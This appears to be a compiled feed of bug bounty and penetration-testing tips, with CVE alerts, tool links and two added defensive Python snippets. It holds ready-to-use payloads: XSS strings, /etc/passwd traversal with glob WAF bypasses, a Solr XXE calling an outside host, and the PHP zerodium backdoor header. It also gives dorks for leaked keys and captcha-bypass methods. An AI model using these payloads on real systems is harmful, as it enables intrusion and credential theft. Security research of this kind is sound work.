🐞 Bug Bounty Tip:
If you find Web frameworks like Symfony, add /app_dev.php/_profiler/open?file=app/config/parameters.yml to the wordlist, and you may get juicy data.
#bugbountytips #tips #cybersec #bugbounty
Uncover sensitive info with: inurl:notepad.link + keyword
Some example keywords:
aws_secret_access_key, "username=" "password=", VISA, PRIVATE KEY, "authToken="
More cool unpublished Dorks:
http://github.com/fatguru/dorks
#bugbountytip
⚡️ XSS Payload
Payload:
1%27;--<img%20src=x%20onerror=javascript:alert(document.domain)>
#bugbountytips #xss #bugbounty #infosecc #cybersec
🚨 [CVE-2024-56145] Exploit released! 🚨
Details, PoC, and setup instructions:
🔗 https://github.com/Chocapikk/CVE-2024-56145
Learn more:
📖 https://assetnote.io/resources/research/how-an-obscure-php-footgun-led-to-rce-in-craft-cms
#bugbountytips #BugBounty
🔖Top 25 JavaScript path files used to store sensitive information in Web Application⬇️
01. /js/config.js
02. /js/credentials.js
03. /js/secrets.js
04. /js/keys.js
05. /js/password.js
06. /js/api_keys.js
07. /js/auth_tokens.js
08. /js/access_tokens.js
09. /js/sessions.js
10. /js/authorization.js
11. /js/encryption.js
12. /js/certificates.js
13. /js/ssl_keys.js
14. /js/passphrases.js
15. /js/policies.js
16. /js/permissions.js
17. /js/privileges.js
18. /js/hashes.js
19. /js/salts.js
20. /js/nonces.js
21. /js/signatures.js
22. /js/digests.js
23. /js/tokens.js
24. /js/cookies.js
25. /js/topsecr3tdonotlook.js
#InfoSec #CyberSecurity #Hacking #BugBounty #bugbountyTools #bugbountytips #Pentest #Fuzzing
Plution is a convenient way to scan at scale for pages that are vulnerable to client side prototype pollution via a URL payload. In the default configuration, it will use a hardcoded payload that can detect 11 of the cases documented
⬇️ LINK:
- https://github.com/raverrr/plution
How to use:
Basic scan, output only to screen:
cat URLs.txt | plution
Scan with a supplied payload rather than hardcoded one:
cat URLs.txt | plution -p '__proto__.zzzc=example'
Note on custom payloads: The variable you are hoping to inject must be called or render to "zzzc". This is because 'window.zzzc' will be run on each page to verify pollution.
Output:
Passing '-o' followed by a location will output only URLs of pages that were successfully polluted.
Concurrency:
Pass the '-c' option to specify how many concurrent jobs are run (default is 5)
#infosec #cybersec #bugbountytips
⚠️ Alert ⚠️
CVE-2024-12084(CVSS 9.8) : Heap overflow that could lead to remote code execution
🔗Hunter Link:hunter.how/list?searchVal…
👇 Query
HUNTER : product.name="rsync"
FOFA : product="rsync"
SHODAN : product:"rsyncd"
📰 Refer:access.redhat.com/security/cve/C…
securityonline.info/cve-2024-12084…
sysdig.com/blog/detecting…
#RSYNC #hunterhow #infosec #infosecurity #OSINT #Vulnerability
Before intercepting even a single request in Burp, enable the Binary and Images filter in the proxy history; it may help you catch directory traversal candidates such as:
load_image?img=assets/imgs/logo.png with ../../../../../etc/passwd
#infosec #cybersec #bugbountytips
📮 Pentesting Bluetooth: The Practical Guide to Hacking Bluetooth Low Energy
1. https://blog.attify.com/the-practical-guide-to-hacking-bluetooth-low-energy/
2. https://pentestpartners.com/security-blog/introduction-to-bluetooth-low-energy/
3. https://book.hacktricks.xyz/todo/radio-hacking/pentesting-ble-bluetooth-low-energy
#infosec #bluetooth
🚀 Captcha Bypass Techniques for Efficient Server Testing 🚀
Bypassing captchas can make server testing and automation easier. It's important to note that this is for testing purposes only, and the goal isn’t to compromise security, but to optimize workflows. Here are some methods to consider:
🔑 1. Parameter Manipulation
Omit Captcha Parameter: Skip the captcha parameter and try switching the HTTP method (e.g., POST → GET) or the data format (form data → JSON).
Submit Empty Captcha: Send the captcha parameter with no value.
🔍 2. Value Extraction & Reuse
Inspect Source Code: Look for captcha values hidden in the page’s source code.
Analyze Cookies: Check cookies for stored captcha values that might be reused.
Reuse Old Captcha: If a captcha was solved successfully, try using the same value. (Note: It may expire.)
Session Manipulation: Try reusing the same captcha value across different sessions or use the same session ID.
🤖 3. Automation & Recognition
Solve Math Captchas: Automate the calculation process for captchas involving simple math.
Image Recognition:
For image-based captchas, identify unique images (use MD5 hashes if limited).
Use OCR (Optical Character Recognition) tools like Tesseract to automate reading characters from images.
⚙️ 4. Additional Techniques
Rate Limit Testing: See if there are submission limits and find ways to bypass or reset them.
Use Third-Party Services: Leverage captcha-solving APIs or services.
Session & IP Rotation: Rotate your session IDs and IP addresses frequently to avoid detection.
User-Agent Manipulation: Change the User-Agent and headers to simulate different browsers or devices.
Audio Captcha Solving: Use speech-to-text services for audio captchas.
💡 Note: These techniques are meant for testing and automating workflows, not for bypassing security measures maliciously. Always ensure your actions are ethical and legal. 🔒
#bypass #Captcha #tricks #hacktricks
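The server-side counterpart to the list above, as an added example that is not part of the original post: a captcha check that rejects each of the listed weak spots (missing or empty parameter, value reused from a solved challenge, value carried over from another session, expired challenge). The session store, form object and function names are constructed stand-ins, not any framework's API.

```python
import hmac
import secrets
import time

# Constructed, in-memory stand-ins for an application's session store and
# form payload; the function names are assumptions, not any framework's API.
TTL_SECONDS = 120

def issue_challenge(session, expected_answer, now=None):
    """Bind a fresh challenge to this session and keep the answer server-side."""
    now = time.time() if now is None else now
    challenge_id = secrets.token_urlsafe(16)
    session["captcha"] = {"id": challenge_id, "answer": str(expected_answer),
                          "issued": now, "used": False}
    return challenge_id

def verify_captcha(session, form, now=None):
    """Return (ok, reason). Call this on every submission path, whatever the
    HTTP method or body encoding, so switching POST->GET or form->JSON
    cannot skip it. Each rejection closes one item from the list above."""
    now = time.time() if now is None else now
    answer = form.get("captcha")
    if answer is None or answer == "":
        return False, "captcha parameter missing or empty"   # omit / empty submit
    challenge = session.get("captcha")
    if challenge is None:
        return False, "no challenge bound to this session"   # value from another session
    if form.get("captcha_id") != challenge["id"]:
        return False, "challenge id mismatch"                # swapped session / challenge
    if challenge["used"]:
        return False, "challenge already consumed"           # reuse of a solved value
    if now - challenge["issued"] > TTL_SECONDS:
        session.pop("captcha")
        return False, "challenge expired"
    # One attempt per challenge, pass or fail: a wrong guess burns the challenge,
    # so a single challenge cannot be brute-forced or replayed.
    challenge["used"] = True
    if not hmac.compare_digest(str(answer), challenge["answer"]):
        return False, "wrong answer"
    return True, "ok"
```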
🚨 TP-Link Vulnerability CVE-2024-54887: Remote Code Execution 🚨
A critical vulnerability in TP-Link devices (CVE-2024-54887) has been discovered, allowing attackers to remotely execute code. This flaw could expose users to significant security risks if left unaddressed. Here's everything you need to know:
💡 What is CVE-2024-54887?
This vulnerability affects TP-Link routers and smart home devices, and it allows attackers to exploit a remote code execution (RCE) flaw. If exploited, an attacker can gain full control over the affected device.
⚠️ Risk of Exploitation
Remote Code Execution (RCE): Attackers can remotely run arbitrary code on the device, allowing them to gain control and potentially compromise the entire network.
Full Device Compromise: With RCE, an attacker can steal sensitive data, alter device configurations, or launch further attacks within the local network.
Impact on IoT Devices: The vulnerability affects a range of TP-Link devices, including routers and IoT products, which could be targeted for botnet attacks, espionage, or other malicious activities.
🛠 How Does the Exploit Work?
Exploiting the Vulnerability: Attackers can send specially crafted requests to the affected TP-Link devices, bypassing authentication mechanisms and executing arbitrary commands.
Exploitation via HTTP Requests: The vulnerability is triggered by manipulating HTTP requests to the vulnerable endpoint. Once triggered, it grants the attacker the ability to execute malicious commands on the device.
💥 Proof of Concept (PoC)
Exploiting the Bug: A PoC exploit has been released, demonstrating how easily this vulnerability can be triggered. It shows how an attacker can interact with a vulnerable device remotely and execute arbitrary code.
Code Execution Risk: The PoC highlights how the exploit can bypass authentication and escalate privileges, potentially leading to device takeover and exploitation.
🛡 How to Protect Yourself
Update Your Firmware:
TP-Link has released a patch to fix the vulnerability. Ensure your device is updated to the latest firmware version that addresses CVE-2024-54887.
Disable Remote Management:
Disable remote management features on your TP-Link device if you don’t need them, as this reduces the attack surface for potential exploits.
Network Segmentation:
Use network segmentation to isolate IoT devices from critical systems, making it harder for attackers to move laterally within your network.
Monitor Network Traffic:
Watch for unusual network traffic patterns, especially HTTP requests targeting your device’s IP, which may indicate exploitation attempts.
Use Strong Authentication:
Ensure strong passwords and two-factor authentication (2FA) are enabled for device access, reducing the chance of successful attacks.
📝 Key Takeaway:
The TP-Link vulnerability CVE-2024-54887 poses serious RCE risks to affected devices. Immediate patching, disabling remote management, and securing network access are critical steps to mitigate potential exploitation.
ZoomEye :
app="TP-LINK TL-WR940N WAP httpd"
6k+ results are found on ZoomEye.
ZoomEye Link: https://zoomeye.ai
Refer: https://securityonline.info/
#RCE #Cyberspacemapping #cybersecurity #ZoomEye #infosec2024
CyberSec Playground | Learn ethical hacking ⚡️
Injectra: Payload Injection via File Magic Numbers Injectra is a robust tool designed for injecting custom payloads into files based on their magic numbers. By leveraging this technique, Injectra modifies files for penetration testing and security research…
💡Injectra : A Python Tool for Seamlessly Injecting Custom Payloads into Files Using Magic Numbers
GitHub: https://github.com/AnonKryptiQuz/Injectra
If your target uses Rails, look for Action View CVE-2019-5418 - File Content Disclosure vuln. Although this is an old bug, it can still be found.
Intercept the request in Burp and replace the Accept header with:
Intercept the request in Burp and replace the Accept header with:
`Accept: ../../../../../../../../../../etc/passwd{{`
#bugbountytips
If the server is deemed to be vulnerable, but a WAF is present:
`../../../../../../e*c/p*s*d{{`
🚀 HExHTTP: Advanced HTTP Header Testing Tool 🚀
HExHTTP is a Python-based tool designed to analyze HTTP headers for vulnerabilities and identify unusual behaviors in web applications. It's ideal for security researchers and penetration testers.
🌟 Features:
- Perform in-depth tests on HTTP headers.
- Detect potential vulnerabilities and security misconfigurations.
- Support for custom headers, user agents, authentication, and more.
📥 Get Started:
Check out the full details and installation
🔗 https://github.com/c0dejump/HExHTTP
#CyberSecurity #PenTesting #HTTPHeaders #HExHTTP #BugBounty #EthicalHacking #WebSecurity #PythonTools #InfoSec #VulnerabilityTesting
⚠️ Alert ⚠️
CVE-2025-21298 : Windows OLE Remote Code Execution Vulnerability
🔥PoC : https://github.com
🧐 Deep Dive : https://redcytadel.com
🔗 Hunter Link:https://hunter.how
🔍 Query
HUNTER :
product.name="Outlook Web App"
FOFA :
product="Microsoft-Outlook"
📰 Refer:https://securityonline.info
#WINDOWS #Outlook #hunterhow #infosec #infosecurity #OSINT #Vulnerability
A neat trick for bypassing WAF/filters while testing for OS command injection vulnerabilities.
Use shell globbing / wildcard expansion. Here is an example:
cat /e*c/p*s*d is equivalent to cat /etc/passwd. But how? Before cat runs, the shell expands the glob pattern /e*c/p*s*d to match actual files and directories in the filesystem.
/e*c: The shell interprets this as "any path starting with /e, followed by zero or more characters (*), ending with c."
/p*s*d: This matches a path or file name starting with p, followed by zero or more characters (*), then s, then zero or more characters (*), then d.
#bugbountytips #hacking
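The expansion described above, as an added example that is not part of the original post: it emulates the shell's component-by-component pathname expansion in Python and uses that emulation as a WAF-style check, scanning a request parameter for glob tokens and resolving each one against a constructed list of sensitive paths, so `/e*c/p*s*d` is flagged as `/etc/passwd` even though the literal string never appears. The path list, regex and function names are constructed for this example.

```python
import fnmatch
import re

# Constructed list of sensitive paths that a WAF rule would normally protect
# by literal string match; the glob trick above defeats that literal match.
SENSITIVE_PATHS = ["/etc/passwd", "/etc/shadow", "/etc/hosts", "/proc/self/environ"]

# A "/"-rooted token that contains at least one glob metacharacter (* ? [).
GLOB_TOKEN = re.compile(r"""/[^\s;|&'"`]*[*?\[][^\s;|&'"`]*""")

def glob_matches_path(pattern, path):
    """Emulate POSIX pathname expansion for a single candidate path.

    The shell matches component by component: '*' and '?' never cross a '/'
    boundary, so the pattern and the path must have the same number of
    components and each component must match its counterpart.
    """
    pat_parts = pattern.split("/")
    path_parts = path.split("/")
    if len(pat_parts) != len(path_parts):
        return False
    return all(fnmatch.fnmatchcase(p, g) for p, g in zip(path_parts, pat_parts))

def expand_against(pattern, candidates):
    """Return the candidate paths the shell would substitute for `pattern`."""
    return [p for p in candidates if glob_matches_path(pattern, p)]

def find_obfuscated_sensitive_paths(value):
    """Scan one request parameter value for glob tokens that would expand to a
    sensitive path. Returns (token, resolved_path) pairs for alerting."""
    hits = []
    for token in GLOB_TOKEN.findall(value):
        for path in expand_against(token, SENSITIVE_PATHS):
            hits.append((token, path))
    return hits
```

Literal paths such as `/etc/passwd` contain no glob metacharacter and are left to the ordinary literal rule; this check only covers the wildcard form.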
This payload can be used for Client Side Template injection and Reflected XSS, perhaps a code injection can be triggered in the background
🚀 Payload :
'%3e%3cscript%3ealert(5*5)%3c%2fscript%3eejj4sbx5w4o
#bugbountytips #BugBounty #payload #cybersecurity
🔍 Bystander: Passive Web Vulnerability Detection Tool 🔍
Overview: Bystander is a Chrome extension that passively monitors network requests to identify potential web vulnerabilities directly within your browser. As you browse, Bystander alerts you to any detected security issues, enhancing your web security awareness.
Key Features:
- Vulnerability Detection: Identifies actual web vulnerabilities such as Cross-Site Request Forgery (CSRF) and Clickjacking.
- Code Sink Alerts: Detects potential code injection points, including NoSQL Injection (NoSQLi), Server-Side Template Injection (SSTI), and Server-Side Includes (SSI).
- API Token Leakage: Alerts you if API tokens are exposed during your browsing sessions.
- Personal Identifiable Information (PII) Monitoring: Notifies you of potential leaks of sensitive information like PAN numbers or hash disclosures.
- Insight Gathering: Observes and reports on staging domains, admin dashboards, and other critical elements in frontend code and network traffic.
Installation Steps:
- Download: Clone or download the Bystander repository from GitHub.
- Load Extension: In your Chromium-based browser (e.g., Chrome), navigate to Settings > Extensions and enable Developer Mode.
- Add Bystander: Click on "Load unpacked" and select the Bystander folder you downloaded.
For more detailed information and to access the source code, visit the Bystander GitHub repository:
https://github.com/itsdivyanshjain/Bystander
See an Apache Solr GET/POST to /select?
Set the 'q' parameter to the following for an XXE injection:
/select?q={!xmlparser v='<!DOCTYPE a SYSTEM "http://collab.burp.net"><a></a>'}
#infosec #cybersec #bugbountytips
If you find PHP 8.1.0-dev then try RCE & SQLi
User-Agentt: zerodiumsleep(5);
User-Agentt: zerodiumsystem('id');
#bugbounty #bugbountytips #rce #sqli #cybersecurity